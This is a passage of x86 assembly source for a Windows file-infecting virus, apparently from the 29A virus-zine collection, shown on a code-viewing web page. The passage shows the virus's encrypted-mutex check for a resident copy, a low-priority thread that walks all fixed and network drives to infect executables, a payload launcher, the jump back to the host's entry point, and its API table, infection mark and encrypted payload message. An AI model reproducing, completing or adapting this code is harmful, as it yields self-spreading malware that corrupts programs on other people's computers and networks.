📄 29a-7.014
字号:
popad
ret
CryptMutexName endp
CheckForCopies proc ; checks whether other resident copy of virus is running
call CryptMutexName ; decrypts mutex name
lea ebx,[ebp+offset szMutexName] ; mutex is used to determine the presence of other copy
push ebx
push 0h
push 1F0001h ; 1F0001h = MUTEX_ALL_ACCESS
call [ebp+_OpenMutexA] ; OpenMutexA returns handle to mutex it it exists already
cmp eax,0h ; if there's no mutex,try to create it...
jne @_mutex_exists
push ebx ; creating mutex...
push 1h
push 0h
call [ebp+_CreateMutexA]
cmp eax,0h
je @_no_mutex_created
jne @_mutex_created
@_no_mutex_created:
call CryptMutexName
mov eax,0FFFFFFFEh ; error, no mutex exists and can't be created
ret
@_mutex_exists:
push eax ; IMPORTANT!!! to close opened mutex handle in order for system to kill the
call [ebp+_CloseHandle] ; the mutex which is always checked as a residency flag!
call CryptMutexName
mov eax,0FFFFFFFFh ; error, mutex exists and can't be created
ret
@_mutex_created:
call CryptMutexName
mov eax,0h ; success, there was no mutex in the system and it has been just created
ret
CheckForCopies endp
StartInfection proc
pushad
; Here we try to get parameter EBP passed to the new thread...
mov ebp,[ebp+0Ch] ; 0Ch = 12, 0Ch points to the first parameter in the stack in a new thread
mov ebp,[ebp]
call [ebp+_GetLogicalDrives] ; getting logical drives....
mov ebx,eax
xor ecx,ecx
@DriveLoop:
push ecx ; and checking whether it's HD or netwrok drive...
mov edx,1h
shl edx,cl
push ebx
and ebx,edx
cmp ebx,0h
je @_do_not_infect_disk
mov edx,65 ; ASCII for 'A'
add edx,ecx
lea edi,[ebp+offset szDestDir]
mov [edi],dl
push edi
call [ebp+_GetDriveTypeA]
cmp eax,3h ; DRIVE_FIXED = 3, according to WinBase.h
je @_infect_disk
cmp eax,4h ; DRIVE_REMOTE = 4, according to WinBase.h
je @_infect_disk
jmp @_do_not_infect_disk
@_infect_disk:
lea edi,[ebp+offset szDestDir]
call InfectPath
@_do_not_infect_disk:
pop ebx
pop ecx
inc ecx
cmp ecx,32
jl @DriveLoop
popad
ret
StartInfection endp
VirusMainThread proc ;if no other copy of virus is running then spawns the infector and the payload
pushad
; Here we try to get parameter EBP passed to the new thread...
mov ebp,[ebp+0Ch] ; 0Ch = 12, 0Ch points to the first parameter in the stack in a new thread
mov ebp,[ebp]
@MainLoop:
call CheckForCopies
cmp eax,0h
je @StartAllSubRoutines
push 1000 ; Sleeping 1 second(s) before performing next check of running copies
call [ebp+_Sleep]
jmp @MainLoop
@StartAllSubRoutines:
; starting the low priority thread for infecting
lea ebx,[ebp+offset ThreadID3]
push ebx
push CREATE_SUSPENDED ; 0h is when u need to run the thread immediately
lea ebx,[ebp+_EBP]
push ebx
lea ebx,[ebp+offset StartInfection]
push ebx
push 0h
push 0h
call [ebp+_CreateThread]
cmp eax,0
je @VirusMainThreadEnd
push eax
push THREAD_PRIORITY_BELOW_NORMAL
push eax
call [ebp+_SetThreadPriority]
call [ebp+_ResumeThread]
; end of starting for the low priority thread for infecting
; starting the payload (it'll decide itself to continue or to stop)
call PayLoad
; exitting our virus main thread, we consider all jobs are done and all the threads are launched!
@VirusMainThreadEnd:
popad
ret
VirusMainThread endp
LaunchVirusMainThread proc ; launching viri's main thread...
pushad
lea ebx,[ebp+offset ThreadID3]
push ebx
push 0h
lea ebx,[ebp+_EBP]
push ebx
lea ebx,[ebp+offset VirusMainThread]
push ebx
push 0h
push 0h
call [ebp+_CreateThread]
popad
ret
LaunchVirusMainThread endp
MainEnd:
mov eax,dword ptr [ebp+_ImageBase] ; virus start point...
sub eax,dword ptr [ebp+_EntryPoint] ; substracting virus entry-point, thus getting ImageBase
add eax,dword ptr [ebp+OldEntryPoint] ; adding old entry-point, thus jumping back to the host
jmp eax
OldEntryPoint dd 0 ; host's old entry-point
K32Address dd ?
K32ExportAddress dd ?
K32OrdinalsAddress dd ?
K32NumberOfExports dd ?
Counter dd 0h
;APIz that I need in my virus
U32Address dd ?
szUser32Dll db "USER32.DLL",0h
szGetProcAddress db "GetProcAddress",0h
szGetModuleHandleA db "GetModuleHandleA",0h
szLoadLibraryA db "LoadLibraryA",0h
szGetFileAttributesA db "GetFileAttributesA",0h
szSetFileAttributesA db "SetFileAttributesA",0h
szCreateFileA db "CreateFileA",0h
szCreateFileMappingA db "CreateFileMappingA",0h
szMapViewOfFile db "MapViewOfFile",0h
szUnmapViewOfFile db "UnmapViewOfFile",0h
szFindFirstFileA db "FindFirstFileA",0h
szFindNextFileA db "FindNextFileA",0h
szFindClose db "FindClose",0h
szSetCurrentDirectoryA db "SetCurrentDirectoryA",0h
szGetLocalTime db "GetLocalTime",0h
szCreateThread db "CreateThread",0h
szSetThreadPriority db "SetThreadPriority",0h
szResumeThread db "ResumeThread",0h
szCreateMutexA db "CreateMutexA",0h
szOpenMutexA db "OpenMutexA",0h
szSleep db "Sleep",0h
szGetLogicalDrives db "GetLogicalDrives",0h
szGetDriveTypeA db "GetDriveTypeA",0h
szGetFileSize db "GetFileSize",0h
szCloseHandle db "CloseHandle",0h
szVirtualAlloc db "VirtualAlloc",0h
szMessageBoxA db "MessageBoxA",0h
szSetWindowTextA db "SetWindowTextA",0h
szGetTopWindow db "GetTopWindow",0h
szGetWindow db "GetWindow",0h
_GetProcAddress dd ?
_GetModuleHandleA dd ?
_LoadLibraryA dd ?
_GetFileAttributesA dd ?
_SetFileAttributesA dd ?
_CreateFileA dd ?
_CreateFileMappingA dd ?
_MapViewOfFile dd ?
_UnmapViewOfFile dd ?
_FindFirstFileA dd ?
_FindNextFileA dd ?
_FindClose dd ?
_SetCurrentDirectoryA dd ?
_GetLocalTime dd ?
_CreateThread dd ?
_SetThreadPriority dd ?
_ResumeThread dd ?
_CreateMutexA dd ?
_OpenMutexA dd ?
_Sleep dd ?
_GetLogicalDrives dd ?
_GetDriveTypeA dd ?
_GetFileSize dd ?
_CloseHandle dd ?
_VirtualAlloc dd ?
_MessageBoxA dd ?
_SetWindowTextA dd ?
_GetTopWindow dd ?
_GetWindow dd ?
InfectionMark db 08Ah,08Ah,0EDh,0CFh,0C5h,0D8h,0CDh,0C3h,0C4h,0CBh,08Ah,08Ah
FileHandle dd INVALID_HANDLE_VALUE
FileSize dd 0h
pMemory dd 0h
PEHdrOffset dd 0h
SectionsNum dd 0h
ImageSize dd 0h
dFileAlignment dd 0h
FileMappedHandle dd 0h
FileAttrib dd 0h
pVirtualMemory dd 0h
szDestDir db "c:\",0h
FindHandle dd 0h
FHandle dd 0h
FindResult WIN32_FIND_DATA ?
szEXEMask db "*.exe",0h
szGlobalMask db "*",0h
szUpDir db "..",0h
szGeorgina db "Georgina",0h
szMutexName db 0E1H,0EFH,0F8H,0E4H,0EFH,0E6H,0F5H,0E6H,0E5H ; encrypted mutex name
db 0FCH,0EFH,097H,0E3H,0F5H,0E6H,0C5H,0DCH,0CFH
db 0F5H,0F3H,0C5H,0DFH,0F5H,0EDH,0CFH,0C5H,0D8H
db 0CDH,0C3H,0C4H,0CBH,0F5H,098H,0E0H,0F0H,0EBH
db 09DH,09FH,09DH,0F5H,0E1H,0E3H,0F9H,0F9H,0EFH
db 0F9H,0AAH
MutexNameSize equ $-szMutexName ; size of mutex name
szVirus db 0FFH,08AH,0D8H,08AH,0C3H,0C4H,0CCH,0CFH,0C9H ; encrypted pyload message
db 0DEH,0CFH,0CEH,08AH,0DDH,0C3H,0DEH,0C2H,08AH
db 0FDH,0C3H,0C4H,099H,098H,084H,0EDH,0CFH,0C5H
db 0D8H,0CDH,0C3H,0C4H,0CBH,08AH,0DCH,0C3H,0D8H
db 0DFH,0D9H,08BH,0A7H,0A0H,0EDH,0CFH,0C5H,0D8H
db 0CDH,0C3H,0C4H,0CBH,086H,0E3H,08AH,0C6H,0C5H
db 0DCH,0CFH,08AH,0DFH,08AH,0CBH,0C4H,0CEH,08AH
db 0DDH,0C3H,0C6H,0C6H,08AH,0C6H,0C5H,0DCH,0CFH
db 08AH,09EH,0CFH,0DCH,0CFH,0D8H,08BH,0A7H,0A0H
db 082H,0E9H,083H,09AH,0CEH,0CFH,0CEH,08AH,0C8H
db 0D3H,08AH,0E1H,0C3H,0E4H,0EFH,0FEH,0C3H,0E1H
db 086H,08AH,0E7H,0CBH,0D3H,08AH,098H,09AH,09AH
db 098H,0AAH
szVirusMsgSize equ $-szVirus ; size of payload message
Time SYSTEMTIME <0,0,0,0,0,0,0,0>
ThreadID1 dd 0h
ThreadID2 dd 0h
ThreadID3 dd 0h
_EBP dd ?
_ImageBase dd ?
_EntryPoint dd ?
infect_section_end:
INFECTLENGTH equ (infect_section_end - infect_section)
CHARSNEW equ 0E0000020h
_1st_generation:
call MessageBox,0,offset szMessage,offset szCaption,MB_OK
call ExitProcess,0
end main
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -